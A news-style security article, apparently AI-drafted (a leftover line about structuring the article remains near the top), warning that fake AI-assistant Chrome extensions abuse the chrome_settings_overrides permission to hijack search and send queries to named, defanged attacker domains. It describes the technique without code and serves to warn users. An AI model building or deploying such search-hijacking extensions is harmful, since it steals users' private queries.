Beware the Fake AI: Malicious Chrome Extensions Hijack Your Search Data

This information details a significant and evolving cybersecurity threat, so I'll structure the article to clearly communicate the risk, the technical mechanism, and the necessary warnings.

Beware the Fake AI: Malicious Chrome Extensions Hijack Your Search Data

A concerning new cybersecurity trend has emerged, exploiting the surging popularity of Artificial Intelligence tools to compromise user security. Threat actors are now distributing malicious Chrome extensions that masquerade as legitimate interfaces for popular AI platforms like ChatGPT, Claude, Perplexity, and Meta Llama, creating a significant risk for individuals and organizations alike.

Palo Alto Networks analysts have identified this renewed activity as part of a strategic shift by attackers to exploit emerging technology trends for maximum impact. The goal is to deceive users seeking convenient, one-click access to these services directly from their browser.

How the Infection Works

These deceptive extensions are far from benign; they operate through a carefully orchestrated mechanism designed to fundamentally compromise user browsing behavior and data security.

1. Persistence through Deception: The malicious extensions exploit Chrome’s chrome_settings_overrides manifest permission. This allows them to permanently alter the browser’s default search engine configuration without the user’s explicit consent or even their awareness.

2. Man-in-the-Middle Redirection: Once installed, the malicious infrastructure acts as a man-in-the-middle. It redirects all search queries to attacker-controlled domains, including chatgptforchrome[.]com and gen-ai-search[.]com.

3. Data Capture: This redirection allows the threat actors to capture sensitive user queries. Any confidential information, personal data, or proprietary business intelligence typed into the search bar is funneled directly to the attackers.

Sophisticated Distribution and Reach

The threat actors are employing sophisticated social engineering techniques, including utilizing YouTube promotional content to entice users into installing the extensions. This demonstrates a clear understanding of modern digital marketing and user acquisition.

While the extensions initially appear functional—allowing users to type prompts directly into the search bar—this is merely an illusion of legitimacy while malicious operations run in the background. With previous iterations of similar campaigns affecting thousands of users, the current threat, which includes eight identified extension identifiers, has demonstrated considerable reach and persistence.